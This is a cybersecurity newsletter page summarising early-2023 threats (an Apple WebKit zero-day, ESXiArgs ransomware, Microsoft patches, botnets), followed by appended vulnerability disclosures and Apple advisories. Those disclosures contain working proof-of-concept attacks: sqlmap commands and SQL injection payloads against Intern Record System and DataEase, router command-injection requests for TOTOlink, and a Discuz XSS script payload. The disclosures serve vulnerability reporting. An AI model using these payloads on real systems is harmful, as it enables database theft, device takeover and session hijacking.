Hey 👋 there, cyber friends!
Welcome to this week's cybersecurity newsletter, where we aim to keep you informed and empowered in the ever-changing world of cyber threats.
In today's edition, we will cover some interesting developments in the cybersecurity landscape and share some insightful analysis of each to help you protect yourself against potential attacks.
1. Apple 📱 Devices Hacked with

Hey 👋 there, cyber friends!

Welcome to **this week's cybersecurity newsletter**, where we aim to keep you informed and empowered in the ever-changing world of cyber threats.

In today's edition, we will cover some interesting developments in the cybersecurity landscape and share some insightful analysis of each to help you protect yourself against potential attacks.

****1\. Apple 📱 Devices Hacked with New Zero-Day Bug - Update ASAP!****

Have you updated your Apple devices lately? If not, it's time to do so, as the tech giant just released security updates for iOS, iPadOS, macOS, and Safari. The update is to fix a zero-day vulnerability that hackers have been exploiting.

This vulnerability, tracked as CVE-2023-23529, is related to a type confusion bug in the WebKit browser engine. What does this mean? Well, it means that if you visit a website with malicious code, the bug can be activated, leading to arbitrary code execution. In other words, hackers can take control of your device and access all your data.

It's scary to think that simply visiting a website could lead to a security breach. This is why it's essential to keep your devices updated with the latest security patches.

****2\. Don't Be the Next Victim: ESXiArgs Ransomware 💥 Strikes 500+ New European Targets****

In a recent discovery by cybersecurity firm Censys, more than 500 hosts have fallen victim to the ESXiArgs ransomware strain. Most of these compromised hosts are located in France, Germany, the Netherlands, the U.K., and Ukraine. What's particularly concerning is that Censys found two hosts with ransom notes dating back to mid-October 2022, shortly after ESXi versions 6.5 and 6.7 reached their end of life.

This means that the attackers behind ESXiArgs have been active for several months, and were able to gain a foothold in these hosts during a time when they were no longer receiving security updates or patches. It also shows that ransomware attacks can take a while to gain traction, and can often go undetected for months before they are discovered.

What's even more alarming is that the ransom notes on the two hosts were updated on January 31, 2023, with a revised version that matches the ones used in the current wave of attacks. This suggests that the attackers have been refining their tactics and improving their ransomware strain to make it more effective.

Ransomware attacks like ESXiArgs can be devastating for organizations, causing data loss, financial losses, and reputational damage. It's important for organizations to stay vigilant and ensure that their systems are always up to date with the latest security patches and updates.

Additionally, having a solid backup and disaster recovery plan can help organizations quickly recover from an attack and minimize its impact.

****3\. DDoS Attack Breaks Record - 71 Million 😮 Requests Per Second!****

Cloudflare, a web infrastructure company, has reported that they have successfully stopped a massive distributed denial-of-service (DDoS) attack. This attack, which peaked at over 71 million requests per second, is the largest HTTP DDoS attack that has been recorded so far, breaking the previous record of 46 million requests per second.

The attack was so large that Cloudflare has dubbed it a "hyper-volumetric" DDoS attack. The attack was targeted at websites that were secured by Cloudflare's platform, and it is believed that the attack originated from a botnet that was made up of more than 30,000 IP addresses from various cloud providers.

This attack is a reminder that DDoS attacks remain a significant threat to websites and online services, and it is crucial for companies to have robust security measures in place to protect against such attacks.

  
**Subscribe to our Daily Newsletters**

We hope you've been enjoying our weekly cybersecurity newsletter as much as we love making it informative and easy to understand. But, we also understand the importance of staying on top of the latest threats and vulnerabilities that can harm your digital life.

That's why we highly recommend subscribing to our daily news updates via email. You'll receive the latest cybersecurity news, insights, resources, offers and analysis straight to your inbox every day.

It's free – Subscribe Now!

****4\. Microsoft 🖥️ Releases Urgent Patches - Update Your Windows ASAP!****

Microsoft has been busy this week, releasing security updates to fix a whopping 75 vulnerabilities in its products. That's a lot of potential ways for cybercriminals to wreak havoc on our devices and systems!

Three of the flaws have already been exploited in the wild, so it's crucial that users update their software as soon as possible. In total, nine of the vulnerabilities are rated as Critical, which means they could allow attackers to take over a device remotely.

But wait, there's more! 37 of the flaws are what are known as remote code execution (RCE) vulnerabilities. These are particularly dangerous because they allow attackers to execute code on a victim's device without any interaction or permission.

So, if you're using any Microsoft products, it's best to update them as soon as possible.

****5\. Linux 🐧 and IoT Devices Under Attack by V3G4 Mirai Botnet****

A new variant of the infamous Mirai botnet has been spotted wreaking havoc in the world of Linux and IoT devices. This new version, dubbed V3G4 by the experts at Palo Alto Networks Unit 42, is making use of 13 security vulnerabilities to spread itself far and wide.

As we know, the Mirai botnet has a notorious history, having been responsible for several high-profile attacks in the past. This new variant only serves to underscore the importance of keeping our devices and systems up to date with the latest security patches and measures.

****6\. Your Favorite Apps Could be Carrying a Dangerous Virus - 🚨 Stay Alert!****

Cybercriminals have launched a new type of attack targeting Chinese-speaking individuals in Southeast and East Asia. Using rogue Google Ads, they are tricking people looking for popular applications like Google Chrome, WhatsApp, and Skype and directing them to fake websites that download malware onto their machines.

The attacks are particularly insidious because they use seemingly legitimate Google Ads to lure in victims. The malware being downloaded is a remote access trojan called FatalRAT, which gives the attackers complete control over the infected machine.

Security researchers are urging people to be cautious when downloading applications, especially from unfamiliar websites.

  
**The Hacker News / Upcoming Webinars**

Are you tired of falling victim to file-based threats and not knowing how to protect your sensitive data? Or are you struggling to keep up with the ever-evolving security challenges of SaaS applications?

Well, have no fear because we have two exciting webinars coming up that will help you bust some common myths and tackle the top security challenges of 2023!

*   Our first webinar, "**A MythBusting Special: 9 Myths about File-based Threats**", will help you separate fact from fiction when it comes to file-based threats. You'll learn the truth about what they are, how they work, and most importantly, how to prevent them from infiltrating your systems.
*   And if you're a fan of SaaS applications but find yourself grappling with security issues, then our second webinar, "**How to Tackle the Top SaaS Security Challenges of 2023**", is the one for you! Our experts will walk you through the most pressing security challenges of 2023, and provide practical tips to help you stay ahead of the game.

Both of these webinars are free and packed with valuable information that you won't want to miss. **So, don't wait - sign up now and join us for an informative and engaging cybersecurity discussion!**

Well folks, that's all for this week's cybersecurity newsletter.

As always, remember that cybersecurity is not just a one-time event or a quick fix. Whether it's using strong passwords, regularly updating your software, or staying aware of phishing scams, every small action can make a big difference in safeguarding your online security.  
So keep those firewalls up, keep those updates coming, and let's continue to stay curious, stay vigilant, and stay safe in the ever-changing digital landscape.

And above all, remember that cybersecurity is a community effort. We appreciate your readership and feedback and are always here to answer your questions and address your concerns. Please let us know if you have any suggestions for topics you'd like us to cover in future newsletters.

Thank you for joining us on this cybersecurity journey, and we look forward to sharing more insights and updates with you in the weeks ahead. Until next time, stay cyber-secure!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

⚡Top Cybersecurity News Stories This Week — Cybersecurity Newsletter

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

**CVE-2022-40347\_Intern-Record-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated**

CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Exploit Title: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Date: 2022-06-09

Exploit Author: Hamdi Sevben

Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/

Software Link: https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

Version: 1.0

Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53

CVE: CVE-2022-40347

References:

https://code-projects.org/intern-record-system-in-php-with-source-code/

https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

1.  Description:

Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

2.  Proof of Concept:

In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.

Then run SQLmap to extract the data from the database:

sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

3.  Example payload:

\-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

4.  Burpsuite request on 'phone' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=

5.  Burpsuite request on 'email' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=

6.  Burpsuite request on 'deptType' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 316

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=

7.  Burpsuite request on 'name' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

CVE-2022-40347: GitHub - h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated: CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Inje

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取province参数下的内容传递给v11，之后将v11带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules”,
"province":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24236: ttt/19 at main · Am1ngl/ttt

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Apple Security Advisory 2023-02-13-2 - macOS Ventura 13.2.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-02-13-2 macOS Ventura 13.2.1

macOS Ventura 13.2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213633.

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google  
Project Zero

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe unprotected user data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

macOS Ventura 13.2.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDke  
NxkM2hAApRo7JQlaNxVVpw1y96PG2oAVygFVw+N1cpEO72L4gDjvAb7+tOBqUTkz  
Az+IizQfC2gapw9g/csghk+s+/gt16Q0iX4jDDEDypZ5So/LoaucFVTbGCy9Hns0  
T0PTS4a0KIFBHbRQ3ktrhkUp49ykqDWwWdnvM1QgtUe3HfAZQWHVnYpdsj26CTaz  
5ihA0chuzAGnx2lUZbyz8nl6f9kdqx1x8uSF0P7AkIp6L7IcZOLLO8tXnKApeC7S  
HSbafe7JKxVNPtzaI/ZuxQe9/9Kr8VUiezVCK+WvJ9akRsy4CQ022yirIOlFIEhF  
32mFq+BaQ77YTULP2us7BG8oMJ3tPxfmlykhqD4P0p4JRW6ZFoQmVKyUEPdsaALG  
NYilSR3CRSpaCbh+dunGMJshNSHRJO6NluLq1mPVB7xFSiypgJADjS95zBSINtC9  
JrKusbpICiAm8VqVC4GNltG+djft0NjbSiJXPo409X7j01Bt1ZJpk2UWTUfZbHMU  
hW90JFySoHLRcVt3Af1mbBkyaHv0GSKG+Fjul/XyBlG3U8eJVXJhWCrhMjm17GK0  
6j4HEUsAYzAg0j+Ss7QQKhwxlW3BPd+3D2kGwbPzBx/rcyVjbc456fyCLSYP58cf  
EIYmmOwF9QcH939TCxoIglHOsdAuuIilGApd2on9QWOj8QSaUFw=  
=2kFu  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-2

Apple Security Advisory 2023-02-13-1 - iOS 16.3.1 and iPadOS 16.3.1 addresses code execution and use-after-free vulnerabilities.

